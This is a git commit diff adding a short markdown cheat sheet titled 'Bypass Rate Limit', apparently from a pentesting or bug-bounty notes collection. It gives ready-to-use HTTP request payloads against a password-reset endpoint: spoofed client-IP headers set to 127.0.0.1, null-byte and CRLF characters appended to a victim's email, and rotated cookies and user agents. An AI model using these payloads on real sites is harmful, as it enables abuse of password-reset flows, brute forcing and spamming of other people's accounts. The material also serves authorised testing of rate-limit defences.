parent
4a3d3210b8
commit
753e0e5031
|
@ -0,0 +1,47 @@
|
||||||
|
# Bypass Rate Limit
|
||||||
|
1. Try add some custom header
|
||||||
|
```
|
||||||
|
X-Forwarded-For : 127.0.0.1
|
||||||
|
X-Forwarded-Host : 127.0.0.1
|
||||||
|
X-Client-IP : 127.0.0.1
|
||||||
|
X-Remote-IP : 127.0.0.1
|
||||||
|
X-Remote-Addr : 127.0.0.1
|
||||||
|
X-Host : 127.0.0.1
|
||||||
|
```
|
||||||
|
For example:
|
||||||
|
```
|
||||||
|
POST /ForgotPass.php HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
X-Forwarded-For : 127.0.0.1
|
||||||
|
[...]
|
||||||
|
|
||||||
|
email=victim@gmail.com
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Adding Null Byte ( %00 ) or CRLF ( %09, %0d, %0a ) at the end of the Email can bypass rate limit.
|
||||||
|
```
|
||||||
|
POST /ForgotPass.php HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
email=victim@gmail.com%00
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Try changing user-agents, cookies and IP address
|
||||||
|
```
|
||||||
|
POST /ForgotPass.php HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
Cookie: xxxxxxxxxx
|
||||||
|
[...]
|
||||||
|
|
||||||
|
email=victim@gmail.com
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /ForgotPass.php HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
Cookie: aaaaaaaaaaaaa
|
||||||
|
[...]
|
||||||
|
|
||||||
|
email=victim@gmail.com
|
||||||
|
```
|
Loading…
Reference in New Issue